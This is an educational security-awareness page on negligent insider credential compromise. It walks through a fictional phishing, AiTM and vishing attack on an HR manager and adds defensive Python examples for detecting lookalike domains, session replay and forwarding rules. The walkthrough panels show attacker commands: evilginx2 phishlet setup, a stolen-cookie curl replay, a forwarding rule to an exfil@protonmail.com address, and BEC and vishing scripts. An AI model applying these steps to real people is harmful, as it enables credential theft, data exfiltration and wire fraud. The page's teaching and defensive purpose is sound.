CERT Insider Threat / MITRE ATT&CK T1078 - Valid Accounts

NEGLIGENT Insider Threat - Unintentional Credential Compromise by Employees

The most common and costliest insider threat isn't malice - it's carelessness. Employees who share passwords, click phishing links, misconfigure systems, or fall for social engineering hand attackers the keys to the kingdom without ever knowing it.

⚠️ 68% OF BREACHES INVOLVE A HUMAN ELEMENT - VERIZON DBIR 2024
Negligent Insider Incidents: 56%
  Of insider threat incidents are caused by negligence - the single largest insider threat category
Average Cost Per Incident: $6.6M
  Average annual cost of a negligent insider program - Ponemon Institute 2023
Phishing Click Rate: 17.8%
  Average employee phishing simulation click rate - even after training programs are deployed
Password Sharing Rate: 49%
  Of employees admit to sharing work credentials with colleagues - LastPass survey 2023

01 / The Negligent Insider - Personas

👩‍💼
The Phishing Victim
MOST COMMON - ALL DEPARTMENTS
"The email looked exactly like IT Support. I just clicked the link and entered my password. I didn't know..."
Clicks a convincing spear-phishing link and enters credentials into a fake login portal. May also approve MFA push requests from the attacker due to notification fatigue.
⚠ RISK: FULL ACCOUNT TAKEOVER
👨‍💻
The Password Sharer
CONVENIENCE-DRIVEN
"I just gave Sarah my login while I was on vacation so she could pull the reports. It was easier than IT."
Shares credentials with colleagues, assistants, or contractors to enable workflow continuity. Creates untracked access, bypasses audit trails, and enables credential harvesting from additional systems.
⚠ RISK: SHARED CREDENTIAL EXPOSURE
👴
The Social Engineering Target
VISHING / PRETEXTING
"He said he was from the help desk and needed my password to reset my account. I just wanted to help..."
Targeted by voice phishing (vishing) or pretexting - an attacker impersonates IT, a vendor, or a colleague and convinces the employee to reveal credentials or reset MFA verbally.
⚠ RISK: DIRECT CREDENTIAL DISCLOSURE
👩‍🔬
The Misconfiguring Developer
TECHNICAL - HIGH IMPACT
"I just pushed the config to GitHub so the team could pull it. I didn't realize the API keys were in there."
Accidentally commits credentials, API keys, or secrets to public code repositories. Attackers continuously scrape GitHub for leaked secrets using automated tooling within minutes of any commit.
⚠ RISK: API / CLOUD CREDENTIAL LEAK
🧑‍💼
The Shadow IT User
UNSANCTIONED TOOLS
"I just signed up for that AI tool with my work email and Google SSO. It seemed useful for my reports..."
Authenticates with corporate SSO or enters work credentials into unauthorized SaaS apps, AI tools, or browser extensions - unknowingly granting OAuth access to corporate data or exposing credentials to unvetted third parties.
⚠ RISK: OAUTH SCOPE OVER-GRANT
👩‍🏫
The Departing Employee
OFFBOARDING GAP
"I still had access for three months after I left. I didn't even realize - I just kept using my old login to check things."
Former employee retains active credentials due to incomplete offboarding. While not always malicious, active accounts of departed employees represent unmonitored access vectors easily exploited or abused.
⚠ RISK: ORPHANED ACCOUNT ACCESS

02 / Anatomy of a Phishing Lure

The Bait - Spot the Red Flags
This email appears in the victim's inbox. How many deceptions can you identify?
🔒 mail.company-secure-portal.com
From: IT-Support <it-support@c0mpany-helpdesk.com>
⚠️ URGENT: Your account will be disabled in 24 hours
Today, 8:47 AM · To: jennifer.martinez@company.com

Dear Jennifer,


Our security systems have detected unusual login activity on your account from an unrecognized device in Lagos, Nigeria.


To protect your account, you must verify your identity within 24 hours or your access will be permanently suspended.


Please click below to verify your identity immediately:

🔐 Verify My Account Now

If you believe this is an error, contact your IT department or click here to dismiss.

RED FLAG ANALYSIS
1
SPOOFED SENDER DOMAIN
c0mpany-helpdesk.com uses a zero (0) instead of an "o" - a lookalike domain. The display name says "IT-Support" but the actual address is external and malicious.
2
URGENCY & FEAR TACTICS
The "24 hours" deadline and the threat of being "permanently suspended" create panic. Attackers manufacture urgency to bypass rational thinking and trigger impulsive clicks before the victim can verify.
3
SUSPICIOUS URL IN BROWSER BAR
The browser shows company-secure-portal.com - not the real company domain. HTTPS and a padlock only mean the connection is encrypted, NOT that the site is legitimate.
4
PERSONALIZED TO LOWER GUARD
Using the victim's real first name (Jennifer) and correct email address - harvested from LinkedIn or prior breaches - makes the email feel genuinely targeted and legitimate.
5
NO INTERNAL VERIFICATION PATH
Legitimate IT teams never ask you to verify credentials via email link. Real alerts always provide a way to contact IT directly - the "dismiss" link here leads to the same attacker-controlled page.
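The red flags above can be checked mechanically before a message reaches the inbox. The block below is an added example written for this page, not code from the original: it parses the From header, de-substitutes common lookalike characters (the zero in c0mpany), compares sender and link domains against a set of trusted domains, and scans the text for urgency language. The trusted-domain set, the brand tokens and the substitution table are assumptions constructed for the example; a production gateway would use a full confusables list and a public-suffix list.

```python
"""Header and lookalike-domain checks for the lure in section 02 (added example)."""
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed for the example: the organisation's real domains and the brand
# tokens an attacker is likely to imitate.
TRUSTED_DOMAINS = {"company.com", "mail.company.com"}
PROTECTED_BRANDS = {"company"}

# Assumption: a minimal substitution table; real tooling uses a full confusables list.
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w", "cl": "d"}
URGENCY_TERMS = ("urgent", "24 hours", "suspended", "immediately", "act now")


def normalise(label: str) -> str:
    """Map digit and letter-pair substitutions back to the letters they imitate."""
    out = label.lower()
    for fake, real in HOMOGLYPHS.items():
        out = out.replace(fake, real)
    return out


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels); assumption: no public-suffix list offline."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def is_lookalike(domain: str) -> bool:
    """True if the domain is untrusted but, after de-substitution, contains a protected brand."""
    if domain in TRUSTED_DOMAINS:
        return False
    return any(brand in normalise(label)
               for label in domain.split(".") for brand in PROTECTED_BRANDS)


def analyse(from_header: str, subject: str, body: str, link_urls: list[str]) -> list[str]:
    """Return the red flags found; an empty list means nothing suspicious was seen."""
    flags = []
    display, address = parseaddr(from_header)
    sender_domain = registrable_domain(address.split("@")[-1])

    if sender_domain not in TRUSTED_DOMAINS:
        flags.append(f"EXTERNAL_SENDER:{sender_domain}")
    if is_lookalike(sender_domain):
        flags.append(f"LOOKALIKE_DOMAIN:{sender_domain}")
    # Display name claims an internal function while the address is external.
    if sender_domain not in TRUSTED_DOMAINS and re.search(
            r"\b(it|helpdesk|support|security)\b", display, re.I):
        flags.append(f"DISPLAY_NAME_SPOOF:{display}")

    text = f"{subject} {body}".lower()
    hits = [t for t in URGENCY_TERMS if t in text]
    if hits:
        flags.append("URGENCY:" + ",".join(hits))

    seen = set()
    for url in link_urls:
        link_domain = registrable_domain(urlparse(url).hostname or "")
        if link_domain in TRUSTED_DOMAINS or link_domain in seen:
            continue
        seen.add(link_domain)
        kind = "LOOKALIKE_LINK" if is_lookalike(link_domain) else "EXTERNAL_LINK"
        flags.append(f"{kind}:{link_domain}")
    return flags


# Constructed input mirroring the lure shown in section 02.
LURE_FROM = "IT-Support <it-support@c0mpany-helpdesk.com>"
LURE_SUBJECT = "URGENT: Your account will be disabled in 24 hours"
LURE_BODY = ("Our security systems have detected unusual login activity on your account. "
             "To protect your account, you must verify your identity within 24 hours or your "
             "access will be permanently suspended. Please click below to verify immediately.")
LURE_LINKS = ["https://mail.company-secure-portal.com/verify",
              "https://mail.company-secure-portal.com/dismiss"]

if __name__ == "__main__":
    for flag in analyse(LURE_FROM, LURE_SUBJECT, LURE_BODY, LURE_LINKS):
        print(flag)
```

Run against the lure, the function reports the external sender, the lookalike sender domain, the spoofed "IT-Support" display name, the urgency phrases and the lookalike link domain; the same routine returns nothing for a routine notice sent from a trusted domain, which is what makes it usable as a gateway rule rather than a one-off check.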

03 / Attack Flow Diagram

🕵️ ATTACKER (external threat actor)
  → SEND → 📧 PHISH LURE (email / SMS / call, spoofed sender)
  → DECEIVE → 👩‍💼 NEGLIGENT USER (clicks link, enters credentials, approves MFA push)
  → CAPTURE → 🔑 CREDS STOLEN (user + pass + MFA, session hijacked)
  → LOGIN → 🏢 CORP SYSTEMS (email / VPN / SaaS, attacker logged in)
  → EXFIL → 💀 DATA BREACH (lateral movement, employee unaware)
① ACTOR ② LURE ③ VICTIM CLICKS ④ CREDS STOLEN ⑤ ACCESS GAINED ⑥ BREACH

04 / Step-by-Step Walkthrough

Phase 01 - Attacker Preparation

The Lure is Crafted

🕵️
ATTACKER ACTION
Reconnaissance & Targeting

Before sending a single email, the attacker researches their target. OSINT gathering from LinkedIn, company websites, and data broker sites reveals employee names, roles, reporting structures, and email formats - enabling hyper-personalized lures.

  • LinkedIn scraping reveals target's name, manager, department, and tenure
  • Email format guessed or confirmed: firstname.lastname@company.com pattern
  • Lookalike domain registered: c0mpany-helpdesk.com (0 instead of o) - $10 cost
  • Spear phish references victim's real manager name to establish false legitimacy
  • Email template mimics exact formatting, logos, and footer of genuine IT communications
attacker - OSINT & prep
  # Harvest target employee data
  $ theHarvester -d company.com -b linkedin
  jennifer.martinez@company.com - HR Manager
  michael.chen@company.com - IT Director
  sarah.kim@company.com - CFO

  # Register convincing lookalike domain
  $ whois c0mpany-helpdesk.com
  Domain registered: available - $9.99/yr

  # Clone login portal with HTTrack
  $ evilginx2 phishlets enable office365
  [+] Phishing proxy live - MFA bypass ready
  [+] Lure sent to jennifer.martinez@company.com
Phase 02 - Delivery

The Email Arrives

👩‍💼
EMPLOYEE
Jennifer Martinez - HR Manager

The phishing email lands in Jennifer's inbox on a busy Monday morning. It bypassed spam filters because the domain was freshly registered, the email was sent via a reputable relay, and it passed SPF/DKIM checks on its own domain.

  • Email arrives 8:47 AM - attacker chose Monday morning peak stress time deliberately
  • Display name shows "IT-Support" - most email clients hide the actual sending address
  • Subject line's ⚠️ emoji and ALL-CAPS trigger urgent emotional response
  • References Jennifer's real name - feels personalized and targeted, not bulk spam
  • Email passed SPF/DKIM checks on the attacker's own (newly registered) domain
📱 JENNIFER'S INBOX - MONDAY 8:47 AM
⚠️ IT-SUPPORT (c0mpany-helpdesk.com)

URGENT: Your account will be disabled in 24 hours due to suspicious login from Nigeria.

Click to verify identity: company-secure-portal.com/verify

JENNIFER (internal monologue)

This looks real... the IT team does send these security alerts. And they used my name. I don't want my account suspended before the board meeting today.

⚠️ IT-SUPPORT - REMINDER (2 mins later)

You have 23 hours and 58 minutes remaining to verify before account suspension. Act now.

JENNIFER

Okay, I'll just quickly verify... I can ask IT about it later if needed.
[clicks the link]

Phase 03 - Credential Entry

The Employee Clicks

😰
VICTIM STATUS
Entering Credentials on Fake Portal

Jennifer lands on a pixel-perfect replica of the company's Microsoft 365 login page. The site has a valid HTTPS certificate (green padlock) - which only proves the connection is encrypted, not that the site is legitimate. She enters her credentials.

  • Fake login page is an AiTM proxy - passes credentials through to real Microsoft in real time
  • Victim sees the "real" Microsoft MFA prompt because the proxy is relaying everything live
  • Jennifer approves the MFA push on her phone - the attacker now has a valid session cookie
  • After submission, Jennifer is redirected to real company portal - she has no idea anything happened
  • The entire capture takes under 60 seconds - credentials and session token exfiltrated instantly
evilginx2 - real-time capture
  # Attacker's AiTM proxy - credential capture

  [08:51:33] Session #4 - new victim
  [08:51:41] Username: jennifer.martinez@company.com
  [08:51:44] Password: SpringTime2024!
             ↑ victim typed this on fake page

  # MFA challenge relayed in real time
  [08:51:46] MFA push sent to victim phone
  [08:51:51] Victim approved MFA push

  [08:51:52] SESSION TOKEN CAPTURED ✓
  [08:51:52] MFA fully bypassed
  [!] Victim redirected to real portal - no suspicion
Phase 03b - Alternative Vector

The Vishing Call

📞
VECTOR
Voice Phishing - IT Impersonation

In parallel or as an alternative, attackers use voice phishing (vishing) - calling employees while impersonating IT support. The social pressure of a live conversation is highly effective: most people find it harder to say no to a person than to ignore an email.

  • Caller ID spoofed to display internal IT helpdesk number - appears completely legitimate
  • Attacker already knows employee name, department, and manager from OSINT reconnaissance
  • Pretext: "We detected ransomware on your machine and need to remote in immediately"
  • Employee asked to read back their temp password reset code or approve a remote session
  • Some attacks combine email lure with immediate follow-up call to push victim to click
📞 INBOUND CALL - "IT HELPDESK" (spoofed) - 2:14 PM
🔴 "DAVID CHEN - IT HELPDESK" (ATTACKER)

Hi Jennifer, this is David from IT Security. I'm calling because our systems flagged your workstation with a critical ransomware alert. I need to help you remotely right now before it spreads to the file server.

JENNIFER

Oh no - really? David always calls when there's an issue... Okay, what do I need to do?

🔴 ATTACKER

I've sent you a password reset code via text. Can you read that back to me so I can authenticate the remote session? We need to act in the next 2 minutes.

JENNIFER - (reads her MFA code)

It says... 847291. Is that what you need?

🔴 ATTACKER

Perfect, thank you Jennifer. All sorted. You'll get a confirmation email shortly. Great job acting quickly!

Phase 04 - Access Exploitation

Credentials Put to Work

🔓
ATTACKER NOW HAS
Full Access as Jennifer Martinez

With Jennifer's session token and credentials, the attacker logs in as her from an anonymous VPN. They now have access to everything Jennifer can access - email, SharePoint, HR systems, payroll, and any SSO-connected applications - without triggering additional alerts.

  • Attacker logs into Microsoft 365 from a VPN endpoint matching Jennifer's country
  • Sets up silent email forwarding rule to copy all inbound mail to attacker inbox
  • Searches email for: "password", "VPN", "AWS", "salary", "acquisition", "board"
  • Accesses HR system through SSO - views employee salary, SSN, and banking details
  • Discovers upcoming M&A deal in executive email thread - highly sensitive insider info
microsoft 365 - attacker session
  # Attacker logs in with stolen session token
  $ curl -H "Cookie: ESTSAUTH=..." https://outlook.office.com
  200 OK - Signed in as jennifer.martinez@company.com

  # Set silent email forward rule
  POST /api/v2.0/me/MailFolders/Inbox/MessageRules
  ForwardTo: exfil@protonmail.com (hidden)
  Rule created - all emails silently copied

  # Search for sensitive content
  $ Search-Mailbox -query "acquisition OR salary OR VPN"
  Found: 847 messages - exfiltrating now
  Found: Project Phoenix M&A - CONFIDENTIAL ⚠
Phase 05 - Expansion

Lateral Movement

🌐
EXPANDING FROM
Jennifer's Account Outward

HR access is a goldmine for lateral movement. Employee records contain SSNs, banking details, and - critically - every other employee's email address and manager relationship. The attacker uses Jennifer's trusted position to pivot to higher-value targets.

  • Sends spear phish to CFO posing as Jennifer - "Can you approve this urgent wire transfer?"
  • Resets password of a contractor account found in HR system with weaker MFA configuration
  • Password spray against other employee emails using common corporate password patterns
  • Uses Jennifer's SSO session to access AWS console through IAM - discovers cloud resources
  • Business Email Compromise: sends fraudulent invoice to finance team as "Jennifer from HR"
lateral movement - BEC & pivoting
  # Business Email Compromise from Jennifer's account
  # Email sent TO: r.wilson@company.com (CFO)
  # FROM: jennifer.martinez@company.com (real account)

  Subject: Urgent - Wire Transfer Needed Today
  Hi Robert - I need you to process a wire for vendor payment $94,000.
  Time sensitive. Account: [attacker mule account details]

  # Pivot to AWS via SSO
  $ aws sts get-caller-identity --profile jennifer-sso
  Account: 123456789012 - Role: HRAdmin
  [!] S3 bucket hr-employee-data - 12,000 records
Phase 06 - Discovery & Aftermath

The Breach is Found

🚨
DISCOVERY - WEEKS LATER
Damage Already Done

Weeks after the initial click, the breach is discovered - often not by security tools but by Jennifer herself noticing odd emails, or by finance flagging the fraudulent wire transfer. By then, months of email have been exfiltrated and the attacker has long since covered their tracks.

  • Jennifer notices "Sent" items she didn't write - alerts IT Security
  • Security team discovers the hidden email forwarding rule - active for 6 weeks
  • Log analysis reveals foreign IP login immediately after Jennifer's session on same day
  • 12,000 employee PII records exfiltrated from S3 - GDPR/HIPAA breach notifications required
  • CFO approved $94K wire transfer - attacker received funds 4 weeks prior, unrecoverable
incident response - breach timeline
  # IR Team - Azure AD sign-in log review
  $ Get-AzureADAuditSignInLogs -Filter "userPrincipalName eq 'jennifer.martinez@company.com'"

  08:51 - j.martinez - 10.4.2.1 (corp VPN) ✓
  08:52 - j.martinez - 185.220.x.x (Tor exit) ✗
          ↑ attacker used stolen session 60sec later

  # Hidden forwarding rule found
  Rule: Forward ALL mail → exfil@protonmail.com
  Created: 6 weeks ago | 2,847 emails forwarded

  [BREACH] 12,000 employee PII records - S3
  [BREACH] $94,000 wire fraud - unrecoverable
  [BREACH] M&A intel exfiltrated - Project Phoenix
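Both artefacts the IR team eventually found by hand (the stolen session replayed from a Tor exit sixty seconds after the real VPN login in Phase 03 and 06, and the hidden forwarding rule created in Phase 04) are detectable on day one if someone is looking for them. The block below is an added example for this page, not part of the original and not the IR team's tooling: it runs two simple rules over constructed sign-in and mail-rule records shaped like the log panel above. The corporate and anonymiser address ranges, the five-minute window and the sample records are all assumptions; a real deployment would take the ranges from its own address plan and a threat-intel feed and pull the events from the sign-in log and the mailbox-rule inventory.

```python
"""Session-replay and external-forwarding detection over constructed log records (added example)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import ipaddress

# Constructed placeholders for the example; load these from real sources in production.
CORP_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]
ANONYMISER_NETWORKS = [ipaddress.ip_network("185.220.100.0/24")]  # placeholder "Tor exit" range
INTERNAL_MAIL_DOMAINS = {"company.com"}
SESSION_REUSE_WINDOW = timedelta(minutes=5)


@dataclass
class SignIn:
    when: datetime
    user: str
    ip: str


@dataclass
class MailRule:
    user: str
    forward_to: str
    hidden: bool  # created through the API with no visible name, as in the incident


def classify_ip(ip: str) -> str:
    """Bucket a source address as corp, anonymiser or other external."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in CORP_NETWORKS):
        return "corp"
    if any(addr in net for net in ANONYMISER_NETWORKS):
        return "anonymiser"
    return "external"


def find_session_reuse(signins: list[SignIn]) -> list[str]:
    """Flag a corp login followed, within the window, by a login for the same user
    from a non-corp address: the AiTM token-replay pattern."""
    alerts = []
    by_user: dict[str, list[SignIn]] = {}
    for s in signins:
        by_user.setdefault(s.user, []).append(s)
    for user, events in by_user.items():
        events.sort(key=lambda e: e.when)
        for prev, cur in zip(events, events[1:]):
            gap = cur.when - prev.when
            if (gap <= SESSION_REUSE_WINDOW and classify_ip(prev.ip) == "corp"
                    and classify_ip(cur.ip) != "corp"):
                alerts.append(f"{user}: corp login {prev.ip} then {classify_ip(cur.ip)} "
                              f"{cur.ip} after {int(gap.total_seconds())}s")
    return alerts


def find_external_forwarding(rules: list[MailRule]) -> list[str]:
    """Flag any rule that forwards to a domain the organisation does not own."""
    alerts = []
    for r in rules:
        domain = r.forward_to.rsplit("@", 1)[-1].lower()
        if domain not in INTERNAL_MAIL_DOMAINS:
            tag = "hidden rule" if r.hidden else "rule"
            alerts.append(f"{r.user}: {tag} forwards to external mailbox {r.forward_to}")
    return alerts


# Constructed sample data mirroring the IR panel: real VPN login, replay 60 s later.
SAMPLE_SIGNINS = [
    SignIn(datetime(2024, 4, 15, 8, 51, 33), "jennifer.martinez@company.com", "10.4.2.1"),
    SignIn(datetime(2024, 4, 15, 8, 52, 33), "jennifer.martinez@company.com", "185.220.100.17"),
    SignIn(datetime(2024, 4, 15, 9, 5, 0), "michael.chen@company.com", "10.4.7.22"),
    SignIn(datetime(2024, 4, 15, 17, 40, 0), "michael.chen@company.com", "10.4.7.22"),
]
SAMPLE_RULES = [
    MailRule("jennifer.martinez@company.com", "exfil@protonmail.com", hidden=True),
    MailRule("michael.chen@company.com", "it-director@company.com", hidden=False),
]

if __name__ == "__main__":
    for line in find_session_reuse(SAMPLE_SIGNINS) + find_external_forwarding(SAMPLE_RULES):
        print("ALERT", line)
```

The first rule catches the replay regardless of whether the second address is a Tor exit or a residential VPN, because it keys on the change of address class within seconds of a corporate login rather than on a specific blocklist; the second rule is the check that would have ended the six-week exfiltration on the day the rule was created.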

05 / The Timeline of Damage

MINUTE 0 - DAY OF ATTACK
Credentials Compromised
Jennifer clicks the link at 8:51 AM. Within 60 seconds, the attacker has her credentials, session token, and MFA bypass. Jennifer has no idea - she's redirected to the real company portal and continues her workday normally.
HOURS 1–4 - SAME DAY
Reconnaissance and Setup
Attacker explores Jennifer's email silently. Sets up forwarding rule. Maps her contacts, reads sensitive threads, and identifies the CFO and finance team. Discovers the M&A deal codename "Project Phoenix." All actions logged as Jennifer.
DAY 3 - THREE DAYS LATER
BEC Wire Fraud Executed
Attacker sends wire transfer request from Jennifer's real email account to CFO Robert Wilson. The $94,000 "vendor payment" is approved and transferred before finance realizes anything is wrong. Funds moved to mule account within hours.
WEEKS 2–6 - ONGOING
Silent Data Exfiltration
For six weeks, every email Jennifer receives is silently copied to the attacker. 12,000 employee PII records exfiltrated from AWS S3. M&A intelligence passed to threat actor clients. Attacker accesses HR system multiple times - all sessions appear as Jennifer.
WEEK 7 - DISCOVERY
Breach Detected - Damage Tallied
Jennifer notices emails in her Sent folder she never wrote. IT Security discovers the forwarding rule, foreign IP logins, and S3 exfiltration logs. Mandatory GDPR/HIPAA breach notifications triggered. Regulatory fines, legal costs, and remediation expenses begin - estimated $3.2M total impact.

06 / Phishing Susceptibility by Department

Simulated Phishing Click Rates
Internal phishing simulation results - % of employees who clicked without training.
  Finance / HR: 71%
  Operations: 58%
  Sales / Marketing: 44%
  Engineering: 32%
  Sec-Aware Trained: 18%
VERIZON DBIR 2024
68% of breaches involved the human element - social engineering, errors, or misuse. Phishing remains the #1 initial access vector for credential theft.
TRAINING EFFECTIVENESS
Organizations with ongoing security awareness training see a 64% reduction in phishing click rates within 12 months. One-time training alone has minimal lasting effect.
REPORTING CULTURE
Only 17% of employees who click phishing links report the incident. Fear of embarrassment keeps the majority silent - allowing attackers to operate undetected for weeks or months.
TIME TO CLICK
The median time for the first click on a phishing campaign is 21 seconds after delivery. Most breaches begin within the first hour of an email campaign launching.

07 / Defensive Countermeasures

🎓
Continuous Security Awareness Training
Monthly simulated phishing campaigns with immediate teachable moments. Role-specific training for high-risk departments (HR, Finance). Gamified security culture - reward reporters, not just penalize clickers.
🔑
Phishing-Resistant MFA (FIDO2 / Passkeys)
Replace SMS OTP and push-notification MFA with hardware keys or passkeys bound to the legitimate domain. Even if an employee submits credentials to a fake site, the attacker cannot complete authentication: the key only signs for the legitimate origin, and the attacker has neither the physical device nor a usable assertion.
📧
Email Security Controls
Enforce DMARC, DKIM, and SPF on all outbound domains. Deploy advanced email filtering (Microsoft Defender, Proofpoint) with lookalike domain detection. Add [EXTERNAL] banners to all inbound email from outside the organization.
🚦
Conditional Access & Zero Trust
Enforce Conditional Access policies requiring compliant managed devices. Block access from Tor exit nodes and known VPN IP ranges. Impossible-travel detection triggers a re-authentication challenge when logins occur from geographically impossible locations.
👁️
Insider Threat Monitoring
Deploy UEBA (User and Entity Behavior Analytics) to baseline normal employee behavior and alert on deviations: bulk email access, new forwarding rules, after-hours logins, and mass file downloads. Detect compromised accounts acting out of character.
🔐
Privileged Access & Least Privilege
Limit access to only what each role requires. HR staff should not have bulk download rights to all employee records. Implement just-in-time (JIT) access for sensitive operations. Segment data access - breach of one account shouldn't expose everything.
📋
Credential Sharing Policies & PAM
Strict no-credential-sharing policy with technical enforcement through Privileged Access Management (PAM) tools. Shared accounts replaced with individual accounts and proper delegation. Enforce password managers across all staff to eliminate Post-it passwords.
🔔
Blameless Reporting Culture
Create psychological safety for employees who fall for phishing - punitive cultures drive incidents underground. The faster an employee reports a suspicious click, the faster security teams can respond. Reward reporters visibly and publicly.
🚪
Automated Offboarding
Immediately disable all accounts, revoke tokens, and remove group memberships upon employee departure - triggered automatically by HRIS offboarding workflow, not manual IT tickets. Orphaned accounts are silent entry points months after termination.
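The phishing-resistant MFA countermeasure is worth seeing in code, because it is the one that breaks the Phase 03 AiTM capture outright rather than just making it noisier. With a FIDO2 key or passkey, the browser (not the user) writes the page's origin into the signed clientDataJSON and derives the RP ID from the page's domain, so on company-secure-portal.com the authenticator has no credential to use and, even if an assertion were produced, the relying party rejects the foreign origin. The block below is an added example, not code from the original page or from any vendor: a minimal server-side verifier for the WebAuthn assertion checks (type, challenge, origin, rpIdHash, user-presence flag), exercised with a constructed challenge answered from the genuine origin and from the phishing origin. The expected origin and RP ID are assumptions, and signature verification is left out because it is identical for both cases and needs a key pair that adds nothing to the point.

```python
"""Relying-party origin binding for a WebAuthn assertion, with constructed data (added example)."""
import base64
import hashlib
import json

# Constructed: the organisation's real login origin and its relying-party id.
EXPECTED_ORIGINS = {"https://login.company.com"}
RP_ID = "login.company.com"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_client_data(challenge: str, origin: str) -> bytes:
    """What the browser hands to the authenticator. The browser fills in the origin
    itself, so a user on a lookalike site cannot 'correct' it."""
    return json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin}).encode()


def make_authenticator_data(rp_id: str, flags: int = 0x05, counter: int = 1) -> bytes:
    """rpIdHash (32 bytes) || flags (1 byte) || signCount (4 bytes). 0x05 = UP + UV."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def verify_assertion(issued_challenge: str, client_data_json: bytes,
                     authenticator_data: bytes) -> tuple[bool, str]:
    """The relying-party checks from the WebAuthn assertion procedure, minus the signature."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not valid JSON"
    if cd.get("type") != "webauthn.get":
        return False, f"unexpected type {cd.get('type')!r}"
    if cd.get("challenge") != issued_challenge:
        return False, "challenge mismatch (replay or wrong session)"
    if cd.get("origin") not in EXPECTED_ORIGINS:
        # This is the check that defeats the AiTM proxy: the signed origin is the phishing site.
        return False, f"origin {cd.get('origin')!r} is not the relying party"
    if authenticator_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match our RP ID"
    if not authenticator_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"


# Constructed: one challenge issued by the real site, answered from two origins.
CHALLENGE = b64url_encode(b"constructed-random-challenge-32-bytes!!")
GENUINE = make_client_data(CHALLENGE, "https://login.company.com")
PHISHED = make_client_data(CHALLENGE, "https://mail.company-secure-portal.com")  # the AiTM page
AUTH_DATA = make_authenticator_data(RP_ID)

if __name__ == "__main__":
    print("genuine origin:", verify_assertion(CHALLENGE, GENUINE, AUTH_DATA))
    print("via AiTM page:", verify_assertion(CHALLENGE, PHISHED, AUTH_DATA))
```

Contrast this with the push-notification MFA in Phase 03, where nothing in the approval is tied to the site the user is looking at, so the proxy can relay the prompt and collect a valid session. A passkey assertion cannot be relayed the same way because the origin is part of what is signed.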